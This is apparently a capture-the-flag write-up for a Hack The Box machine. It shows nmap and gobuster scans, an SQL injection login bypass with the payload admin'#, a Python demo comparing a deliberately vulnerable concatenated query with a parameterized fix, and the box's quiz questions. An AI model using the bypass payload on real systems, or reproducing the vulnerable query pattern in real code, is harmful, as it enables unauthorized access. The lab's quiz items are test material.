Difficulty: Very Easy | Tier 1 | OS: Linux | Target: 10.129.17.133

$ appointment.pwn()

A web application running on port 80 is vulnerable to SQL injection in its login form. Submitting the username admin'# closes the username string literal with the single quote and then uses the MySQL comment character (#) to comment out the rest of the WHERE clause, including the password check, so we log in as admin without knowing the password.

Techniques

SQL Injection, Comment-based Auth Bypass, Directory Enumeration

Open Ports

80/tcp    http    Apache httpd 2.4.38 (Debian)

Terminal Session

wazimu@htb ~ appointment
┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ nmap 10.129.17.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-01 00:37 CDT
Nmap scan report for 10.129.17.133
Host is up (0.010s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ gobuster dir -u 10.129.17.133:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.17.133:80
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.129.17.133/images/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.17.133/css/]
/js                   (Status: 301) [Size: 311] [--> http://10.129.17.133/js/]
/vendor               (Status: 301) [Size: 315] [--> http://10.129.17.133/vendor/]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.17.133/fonts/]
/server-status        (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

# Bypassed the login form using SQL injection
# Username: admin'#
# Password: admin (any value works; the # comments out the password check)

[✓] Flag captured!
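To make the comment-based bypass concrete, here is an added example (not code from the Appointment box or from HTB) that rebuilds the vulnerable string-concatenated login query beside a parameterized version. The users table and passwords are constructed sample data. It runs against SQLite so it works offline; SQLite does not treat # as a comment, so the executed payload uses SQLite's -- comment token, which collapses the query in exactly the same way the MySQL admin'# payload does on the target. The MySQL form is shown as the query text it would produce.

```python
import sqlite3
from typing import Optional

# Constructed sample data standing in for the application's users table.
SAMPLE_USERS = [
    ("admin", "Sup3rS3cr3t!"),
    ("guest", "guest"),
]


def build_vulnerable_query(username: str, password: str) -> str:
    """Build the login query by string concatenation, the pattern behind the bypass.

    With username admin'# on MySQL the result is
        SELECT username FROM users WHERE username='admin'#' AND password='...'
    and everything after # is a comment, so only the username is checked.
    """
    return (
        "SELECT username FROM users WHERE username='"
        + username
        + "' AND password='"
        + password
        + "'"
    )


def _connect() -> sqlite3.Connection:
    """In-memory SQLite database loaded with the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(username: str, password: str) -> Optional[str]:
    """Execute the concatenated query. Returns the matched username, or None."""
    conn = _connect()
    try:
        row = conn.execute(build_vulnerable_query(username, password)).fetchone()
        return row[0] if row else None
    finally:
        conn.close()


def safe_login(username: str, password: str) -> Optional[str]:
    """Same lookup with bound parameters: the quote and comment stay data, not SQL."""
    conn = _connect()
    try:
        row = conn.execute(
            "SELECT username FROM users WHERE username=? AND password=?",
            (username, password),
        ).fetchone()
        return row[0] if row else None
    finally:
        conn.close()


if __name__ == "__main__":
    # The MySQL payload from the writeup, shown as the query text it produces.
    print(build_vulnerable_query("admin'#", "anything"))
    # SQLite equivalent (-- comment): same structure, same password-check bypass.
    print(vulnerable_login("admin'-- ", "anything"))
    # Parameterized query: the payload is looked up literally and finds nothing.
    print(safe_login("admin'-- ", "anything"))
```

The fix is the parameterized query, not input filtering: stripping # or ' from the username would leave other comment forms and encodings to find, whereas binding parameters keeps user input out of the SQL grammar entirely.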

Tasks (10)

1. What does the acronym SQL stand for?
2. What is one of the most common types of SQL vulnerabilities?
3. What is the 2021 OWASP Top 10 classification for this vulnerability?
4. What does Nmap report as the service and version that are running on port 80 of the target?
5. What is the standard port used for the HTTPS protocol?
6. What is a folder called in web-application terminology?
7. What HTTP response code is given for 'Not Found' errors?
8. Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains?
9. What single character can be used to comment out the rest of a line in MySQL?
10. If user input is not handled carefully, it could be interpreted as a comment. Use a comment to log in as admin without knowing the password. What is the first word on the webpage returned?

Root Flag